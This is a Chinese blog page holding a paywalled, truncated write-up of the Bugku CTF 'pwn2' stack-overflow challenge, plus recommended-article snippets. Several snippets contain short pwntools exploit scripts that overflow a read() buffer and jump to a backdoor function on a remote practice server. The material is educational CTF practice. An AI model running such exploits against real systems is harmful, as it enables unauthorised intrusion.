bugku中pwn2的write up

最新推荐文章于 2021-11-14 22:18:19 发布
原创 最新推荐文章于 2021-11-14 22:18:19 发布 · 466 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#bugku #pwn2

bugku中pwn2的write up

作为一个初出茅庐的菜鸟,做几个简单的pwn题练一下,正好学一下基础知识。
首先来看这道题,checksec一下,我们发现,没有打开什么保护。
在这里插入图片描述
运行一下,看看需要在哪里插入payload。
在这里插入图片描述
注意这里需要先赋予运行权限,笔者作为新手犯了几次错误。
在这里插入图片描述
把程序放进IDA中看一下套路流程。
在这里插入图片描述
我们在read函数这里可以使程序溢出。也看到ebp的位置,偏移量为0x30。
很明显地发现了得到flag的函数:
在这里插入图片描述
在这里插入图片描述
得到地址0x0000000000400751。
开始构造exp。

fro
最低0.47元/天 解锁文章
BugkuCTF练习平台pwn3(read_note)的writeup
只影的博客
03-05 1718
Bugkupwn题中,这道题分值最高,也是难度最大的一道。难点在于,第一要读懂题目找出漏洞,第二是要绕过各种保护机制,第三是exp的编写调试。看一眼程序的保护机制,发现除了RELRO所有保护全开,还是有点头疼的,毕竟我刚开始学pwn没几天,还没有做过PIE和Canary的题目,所以调试还是花了不少时间的。 首先分析程序,重要部分如下所示。一开始会让你输入一个路径,不存在的话就会报错推出,然后打...
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2797
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
BugKu - pwn2
Casuall的博客
07-06 3865
这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
Bugku pwn2
、moddemod
05-26 569
pwn2 题目 chmod +x pwn2 这里都关闭了,栈上可执行! 这个程序里面直接留了后门get_shell_ 思路,输入的数据超过0x30栈空间大小,将get_shell_地址覆盖调用main函数的返回地址即可, 即b'm' * (0x30 + 8) + p64(0x400751),这里加上8是因为push了rbp,即8个字节大小 exp from pwn import * p = remote('114.116.54.89', '10003') payload = b'a' * (0x
bugku pwn2
doudoudedi
06-04 1749
这道题是一道简单的栈溢出 直接用IDA查看 很明显的得到flag的函数 直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...
bugku-PWN-瑞士军刀解析过程
weixin_46168073的博客
11-14 2309
一、启动场景 点进去,我发现点不进去,搞了半天,花了10个币才搞明白这个不是点的,而是连接的。 这里使用kali。 kali vmwar免安版本: 链接:https://pan.baidu.com/s/1SvbXZlx-0h5gN5__rOp2bg 提取码:1234 二、解题过程 安装kali之后,我们直接开大,然后输入nc 114.67.246.176 13340(端口有变是因为我重启了一次,这里输入,你的端口。) 然后ls,目录下有个flag目录,直接cat flag目录...
BugkuCTF pwn题第一弹
weixin_43489686的博客
09-09 2259
BugkuCTF pwn题第一弹
BugkuCTF pwn canary
ChaoYue_miku的博客
07-03 1348
** 0、下载附件使用checksec检查保护情况 ** 开启了NX保护和Canary保护 ** 1、nc 114.67.246.176 19138远程连接,查看题目 ** ** 2、使用IDA 64 Pro打开文件反编译 ** 查看main函数,两个read()函数都可以读取0x300个字节的数据,而buf和v5到栈底指针rbp的距离只有0x240和0x210字节,因此这里存在栈溢出漏洞 靠近栈底处的var_8应该就是canary 查看main函数的汇编指令 结合题意可知,覆盖canary末尾的
bugku-pwn2
ro4lsc的博客
05-31 790
pwn2 首先我对pwn题完全没有了解,真萌新,所以就刷刷最基础的题目吧。 我是使用了pwndocker,第一次用没啥感觉。 docker exec -it mypwn /bin/bash wget https://ctf.bugku.com/files/ad67ac41b68c70c40d90bce4a39796e4/pwn2 checksec pwn2 这个东西我暂时看不懂,只知道这个pwn2是个64位程序 用IDA打开,找到main函数F5 int __cdecl main(int argc,
[pwn]bugku pwn2
qq_18823653的博客
03-26 5739
首先检查了一下保护机制,发现几乎啥保护都没有,ida查看一下 read()函数存在溢出,然后又看了一下发现main函数下面有一个get_shell_函数,点进去看了看应该是让返回地址覆盖成getshell地址, gdb看一下偏移rbp前四位为bAA1,算一下偏移 到rbp偏移为48,向上8字节是父函数rbp,所以偏移56覆盖到返回地址,get_shell_地址为 exp如下: from pwn ...
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
Writeup bugku刷题 pwn2
Migraine‘s Blog
05-13 2434
概述:bugku新出的pwn题,练一练手 关键字:栈溢出 x64 网址:https://ctf.bugku.com/challenges 分析一下代码,发现非常明显是x64下的栈溢出。 Pwntools生成shellcode >>> from pwn import * >>> context(os='linux...
Bugku旧平台pwn writeup
a370793934的专栏
11-28 876
Pwn1 nc 114.116.54.89 10001 连上cat flag: flag{6979d853add353c9} Pwn2 #!/usr/bin/env python3 # -*- coding:utf-8 -*- from pwn import * context.log_level='debug' p = process("./pwn2") #p = re...
bugku-pwn2-wp
weixin_45427676的博客
04-05 429
下载完题后先在VM中checksec查看保护机制 基本没有开什么保护,可以知道文件是64位的,用64位IDA打开,按F5键反汇编一下,看一下main函数 可以发现read()函数存在栈溢出漏洞,缓冲区s的大小为0x30,而read()函数指向缓冲区中读入0x100大小的数据,所以造成栈溢出。 在main函数下面有一个get_shell_()函数,打开看一下 有一个system(“cat fl...
bugku_pwn2 | by AriSan
AriSan_XD的博客
05-02 328
bugku_pwn2栈溢出入门 | AriSan 看源码,非常明显的栈溢出 直接有后门函数 checksec后没有任何保护 使用 gdb调试,在 read 函数处下断点,运行,因为是64位的程序,得到栈空间为 RBP-RSI+8=0x70-0x40+8=56 使用垃圾数据填满栈空间后,覆盖返回地址为后门函数地址,直接执行后门函数 成功 exp: from pwn import * p ...
BugkuCtf-pwn2-exp
weixin_30340745的博客
08-22 429
#!/usr/bin/env python from pwn import * p = process('./pwn2') payload = 'a' * 56 + p64(0x400751) p.recvuntil('?') p.sendline(payload) print p.recvall() 转载于:https://www.cnblo...
[Bugku CTF——Pwn] pwn2
Y_peak的博客
03-22 436
[Bugku CTF——Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.inter
BugkuCTF pwn1 pwn2 pwn4 pwn5 pwn3 详细writeup【橘小白】
kety_gz的博客
09-03 9589
buku的pwn按照难度的顺序依次是pwn1,pwn2pwn4,pwn5,pwn3 这些题目的libc pwn1 nc连接后直接就有执行权限 ls cat flag 得到flag pwn2 下载文件放入ida 有一个有shell,我们只需要将程序跳转到这里 选择main F5查看代码 看到这个s申请了0x30个字节,但是下边read了0x100字节,就造成了栈溢出,我们只要将返回地址溢出为...
bugku pwn2学习心得以及wp
欢迎来到神林的博客
08-25 828
拿到题目: file查看一下文件类型,可以看到 x86-64,以及 dynamically linked,所以 64位,动态连接的。 查看一下有没有开什么保护机制: 嘛都没开,直接放到64位IDA里面看一看。 看到敏感名称函数“getshell” 感觉能直接拿flag,方法就是找到一个地方跳转到getshell函数地址,查看一下地址为:0x400715 转手看main函数: 其中有一个re...
CTF比赛PWN项目源码及write-up解析
文件名称列表中的"write-ups-pwn-master"暗示了这个压缩包内可能包含了一系列的write-ups文档,这些文档专门针对Pwn类题目。文件名中的"write-ups"表明内容是关于如何解决CTF比赛中的Pwn题目的详细攻略。"pwn"指出了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值